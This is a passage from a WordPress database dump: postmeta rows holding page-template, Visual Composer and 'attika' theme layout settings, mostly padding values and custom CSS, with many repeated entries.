0'),(38988,3065,'mkdf_disable_vertical_header_background_image_meta','no'),(38989,3065,'mkdf_disable_header_widget_areas_meta','no'),(38990,3065,'mkdf_title_area_type_meta','attika'),(38991,3065,'_dp_original','1151'),(38992,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38993,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38994,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38995,3066,'_wp_page_template','default'),(38996,3066,'slide_template','default'),(38997,3066,'_wpb_vc_js_status','true'),(38998,3066,'mkdf_page_content_behind_header_meta','no'),(38999,3066,'mkdf_page_content_padding','100px 0 100px 0'),(39000,3066,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39001,3066,'mkdf_disable_vertical_header_background_image_meta','no'),(39002,3066,'mkdf_disable_header_widget_areas_meta','no'),(39003,3066,'mkdf_title_area_type_meta','attika'),(39004,3066,'_dp_original','1160'),(39005,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39006,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39007,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39008,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39009,3067,'_wp_page_template','full-width.php'),(39010,3067,'slide_template','default'),(39011,3067,'_wpb_vc_js_status','true'),(39012,3067,'mkdf_page_content_behind_header_meta','no'),(39013,3067,'mkdf_page_content_padding','30px 30px 50px 30px'),(39014,3067,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(39015,3067,'mkdf_disable_vertical_header_background_image_meta','no'),(39016,3067,'mkdf_disable_header_widget_areas_meta','no'),(39017,3067,'mkdf_title_area_type_meta','attika'),(39018,3067,'_dp_original','1167'),(39019,3068,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39020,3068,'_wp_page_template','full-width.php'),(39021,3068,'slide_template','default'),(39022,3068,'_wpb_vc_js_status','true'),(39023,3068,'mkdf_page_content_behind_header_meta','no'),(39024,3068,'mkdf_page_content_padding','0 0 0 0'),(39025,3068,'mkdf_page_content_padding_mobile','0 0 0 0'),(39026,3068,'mkdf_disable_header_meta','yes'),(39027,3068,'mkdf_disable_vertical_header_background_image_meta','no'),(39028,3068,'mkdf_disable_header_widget_areas_meta','no'),(39029,3068,'mkdf_show_title_area_meta','no'),(39030,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(39031,3068,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\n    #mkdf-back-to-top {\n        right: 55px; \n    }\n}'),(39032,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39033,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39034,3069,'_wp_page_template','full-width.php'),(39035,3069,'slide_template','default'),(39036,3069,'_wpb_vc_js_status','true'),(39037,3069,'mkdf_page_content_behind_header_meta','no'),(39038,3069,'mkdf_disable_vertical_header_background_image_meta','no'),(39039,3069,'mkdf_disable_header_widget_areas_meta','no'),(39040,3069,'mkdf_page_content_padding','80px 0 '),(39041,3069,'_dp_original','50'),(39042,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(39043,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39044,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39045,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39046,3070,'_wp_page_template','full-width.php'),(39047,3070,'slide_template','default'),(39048,3070,'_wpb_vc_js_status','true'),(39049,3070,'mkdf_page_content_behind_header_meta','no'),(39050,3070,'mkdf_disable_vertical_header_background_image_meta','no'),(39051,3070,'mkdf_disable_header_widget_areas_meta','no'),(39052,3070,'mkdf_page_content_padding','100px 0 110px'),(39053,3070,'_dp_original','1241'),(39054,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39055,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(39056,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39057,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39058,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39059,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(39060,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(39061,3071,'_wp_page_template','full-width.php'),(39062,3071,'slide_template','default'),(39063,3071,'_wpb_vc_js_status','true'),(39064,3071,'mkdf_page_content_behind_header_meta','no'),(39065,3071,'mkdf_disable_vertical_header_background_image_meta','no'),(39066,3071,'mkdf_disable_header_widget_areas_meta','no'),(39067,3071,'mkdf_page_content_padding','120px 0 140px'),(39068,3071,'_dp_original','1250'),(39069,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39070,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(39071,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39072,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39073,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39074,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39075,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(39076,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(39077,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(39078,3072,'_wp_page_template','full-width.php'),(39079,3072,'slide_template','default'),(39080,3072,'_wpb_vc_js_status','true'),(39081,3072,'mkdf_page_content_behind_header_meta','no'),(39082,3072,'mkdf_disable_vertical_header_background_image_meta','no'),(39083,3072,'mkdf_disable_header_widget_areas_meta','no'),(39084,3072,'mkdf_page_content_padding','100px 0 90px'),(39085,3072,'_dp_original','1297'),(39086,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39087,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(39088,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39089,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39090,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39091,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39092,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(39093,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(39094,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(39095,1382,'_wp_page_template','full-width.php'),(39096,1382,'slide_template','default'),(39097,1382,'_wpb_vc_js_status','true'),(39098,1382,'mkdf_page_content_behind_header_meta','no'),(39099,1382,'mkdf_disable_vertical_header_background_image_meta','no'),(39100,1382,'mkdf_disable_header_widget_areas_meta','no'),(39101,1382,'mkdf_page_content_padding','120px 0 100px'),(39102,1382,'_dp_original','1297'),(39103,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39104,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39105,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39106,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39107,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39108,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39109,1393,'_wp_page_template','full-width.php'),(39110,1393,'slide_template','default'),(39111,1393,'_wpb_vc_js_status','true'),(39112,1393,'mkdf_page_content_behind_header_meta','no'),(39113,1393,'mkdf_disable_vertical_header_background_image_meta','no'),(39114,1393,'mkdf_disable_header_widget_areas_meta','no'),(39115,1393,'mkdf_page_content_padding','120px 0 110px'),(39116,1393,'_dp_original','1382'),(39117,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39118,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(39119,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39120,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39121,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39122,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39123,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(39124,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(39125,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(39126,1642,'_wp_page_template','full-width.php'),(39127,1642,'slide_template','default'),(39128,1642,'_wpb_vc_js_status','true'),(39129,1642,'mkdf_page_content_behind_header_meta','no'),(39130,1642,'mkdf_disable_vertical_header_background_image_meta','no'),(39131,1642,'mkdf_disable_header_widget_areas_meta','no'),(39132,1642,'mkdf_page_content_padding','120px 0'),(39133,1642,'_dp_original','1297'),(39134,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39135,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39136,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39137,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39138,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39139,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39140,1650,'_wp_page_template','full-width.php'),(39141,1650,'slide_template','default'),(39142,1650,'_wpb_vc_js_status','true'),(39143,1650,'mkdf_page_content_behind_header_meta','no'),(39144,1650,'mkdf_disable_vertical_header_background_image_meta','no'),(39145,1650,'mkdf_disable_header_widget_areas_meta','no'),(39146,1650,'mkdf_page_content_padding','30px 0'),(39147,1650,'_dp_original','1642'),(39148,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(39149,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39150,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39151,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39152,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39153,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39154,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39155,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39156,1658,'_wp_page_template','full-width.php'),(39157,1658,'slide_template','default'),(39158,1658,'_wpb_vc_js_status','true'),(39159,1658,'mkdf_page_content_behind_header_meta','no'),(39160,1658,'mkdf_disable_vertical_header_background_image_meta','no'),(39161,1658,'mkdf_disable_header_widget_areas_meta','no'),(39162,1658,'mkdf_page_content_padding','120px 0'),(39163,1658,'_dp_original','1650'),(39164,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39165,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39166,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39167,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39168,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39169,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39170,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39171,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39172,1662,'_wp_page_template','full-width.php'),(39173,1662,'slide_template','default'),(39174,1662,'_wpb_vc_js_status','true'),(39175,1662,'mkdf_page_content_behind_header_meta','no'),(39176,1662,'mkdf_disable_vertical_header_background_image_meta','no'),(39177,1662,'mkdf_disable_header_widget_areas_meta','no'),(39178,1662,'mkdf_page_content_padding','120px 0 105px'),(39179,1662,'_dp_original','1658'),(39180,1679,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39181,1679,'_wp_page_template','blog-standard'),(39182,1679,'slide_template','default'),(39183,1679,'_wpb_vc_js_status','false'),(39184,1679,'mkdf_page_content_behind_header_meta','no'),(39185,1679,'mkdf_blog_category_meta','recepies'),(39186,1679,'mkdf_show_posts_per_page_meta','5'),(39187,1679,'mkdf_sidebar_layout_meta','sidebar-25-right'),(39188,1679,'mkdf_disable_vertical_header_background_image_meta','no'),(39189,1679,'mkdf_disable_header_widget_areas_meta','no'),(39190,1679,'mkdf_page_content_padding','120px 0 100px'),(39191,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39192,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(39193,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39194,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39195,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39196,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39197,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(39198,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(39199,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(39200,1722,'_wp_page_template','full-width.php'),(39201,1722,'slide_template','default'),(39202,1722,'_wpb_vc_js_status','true'),(39203,1722,'mkdf_page_content_behind_header_meta','no'),(39204,1722,'mkdf_disable_vertical_header_background_image_meta','no'),(39205,1722,'mkdf_disable_header_widget_areas_meta','no'),(39206,1722,'mkdf_page_content_padding','0'),(39207,1722,'_dp_original','1297'),(39208,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39209,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(39210,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39211,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39212,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39213,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39214,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39215,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(39216,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(39217,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(39218,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(39219,1734,'_wp_page_template','full-width.php'),(39220,1734,'slide_template','default'),(39221,1734,'_wpb_vc_js_status','true'),(39222,1734,'mkdf_page_content_behind_header_meta','no'),(39223,1734,'mkdf_disable_vertical_header_background_image_meta','no'),(39224,1734,'mkdf_disable_header_widget_areas_meta','no'),(39225,1734,'mkdf_page_content_padding','0'),(39226,1734,'_dp_original','1722'),(39227,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39228,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39229,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39230,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39231,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39232,1742,'_wp_page_template','full-width.php'),(39233,1742,'slide_template','default'),(39234,1742,'_wpb_vc_js_status','true'),(39235,1742,'mkdf_page_content_behind_header_meta','no'),(39236,1742,'mkdf_disable_vertical_header_background_image_meta','no'),(39237,1742,'mkdf_disable_header_widget_areas_meta','no'),(39238,1742,'mkdf_page_content_padding','120px 0 0'),(39239,1742,'_dp_original','1297'),(39240,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39241,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39242,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39243,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39244,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39245,3073,'_wp_page_template','full-width.php'),(39246,3073,'slide_template','default'),(39247,3073,'_wpb_vc_js_status','true'),(39248,3073,'mkdf_page_content_behind_header_meta','no'),(39249,3073,'mkdf_disable_vertical_header_background_image_meta','no'),(39250,3073,'mkdf_disable_header_widget_areas_meta','no'),(39251,3073,'mkdf_page_content_padding','110px 0 120px'),(39252,3073,'_dp_original','1297'),(39253,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39254,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39255,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39256,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39257,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39258,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39259,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39260,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39261,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39262,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39263,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39264,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39265,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(39266,1804,'_wp_page_template','full-width.php'),(39267,1804,'slide_template','default'),(39268,1804,'_wpb_vc_js_status','true'),(39269,1804,'mkdf_page_content_behind_header_meta','no'),(39270,1804,'mkdf_disable_vertical_header_background_image_meta','no'),(39271,1804,'mkdf_disable_header_widget_areas_meta','no'),(39272,1804,'mkdf_page_content_padding','120px 0 70px'),(39273,1804,'_dp_original','1734'),(39274,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39275,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39276,1805,'_wp_page_template','full-width.php'),(39277,1805,'slide_template','default'),(39278,1805,'_wpb_vc_js_status','true'),(39279,1805,'mkdf_page_content_behind_header_meta','no'),(39280,1805,'mkdf_page_content_padding','0 0 0 0'),(39281,1805,'mkdf_page_content_padding_mobile','0 0 0 0'),(39282,1805,'mkdf_header_type_meta','header-minimal'),(39283,1805,'mkdf_disable_vertical_header_background_image_meta','no'),(39284,1805,'mkdf_disable_header_widget_areas_meta','no'),(39285,1805,'mkdf_show_title_area_meta','no'),(39286,1805,'mkdf_disable_footer_meta','yes'),(39287,1805,'_dp_original','569'),(39288,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39289,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39290,1811,'_wp_page_template','full-width.php'),(39291,1811,'slide_template','default'),(39292,1811,'_wpb_vc_js_status','true'),(39293,1811,'mkdf_page_content_behind_header_meta','no'),(39294,1811,'mkdf_page_content_padding','0 0 0 0 '),(39295,1811,'mkdf_page_content_padding_mobile','0 0 0 0'),(39296,1811,'mkdf_set_menu_area_position_meta','center'),(39297,1811,'mkdf_disable_vertical_header_background_image_meta','no'),(39298,1811,'mkdf_menu_area_background_color_meta','#ffffff'),(39299,1811,'mkdf_menu_area_background_transparency_meta','40%'),(39300,1811,'mkdf_disable_header_widget_areas_meta','no'),(39301,1811,'mkdf_show_title_area_meta','no'),(39302,1811,'mkdf_disable_footer_meta','yes'),(39303,1811,'mkdf_header_type_meta','header-standard'),(39304,1811,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(39305,1811,'mkdf_header_behaviour_meta','no-behavior'),(39306,1811,'_dp_original','1008'),(39307,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39308,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39309,1819,'_wp_page_template','default'),(39310,1819,'slide_template','default'),(39311,1819,'_wpb_vc_js_status','true'),(39312,1819,'mkdf_page_content_behind_header_meta','no'),(39313,1819,'mkdf_disable_vertical_header_background_image_meta','no'),(39314,1819,'mkdf_disable_header_widget_areas_meta','no'),(39315,1819,'mkdf_show_title_area_meta','no'),(39316,1819,'mkdf_disable_footer_meta','yes'),(39317,1819,'mkdf_menu_area_in_grid_meta','yes'),(39318,1819,'mkdf_header_type_meta','header-minimal'),(39319,1819,'mkdf_page_content_padding','0 0 0 0'),(39320,1819,'mkdf_page_content_padding_mobile','0 0 0 0'),(39321,1819,'_dp_original','610'),(39322,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39323,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px 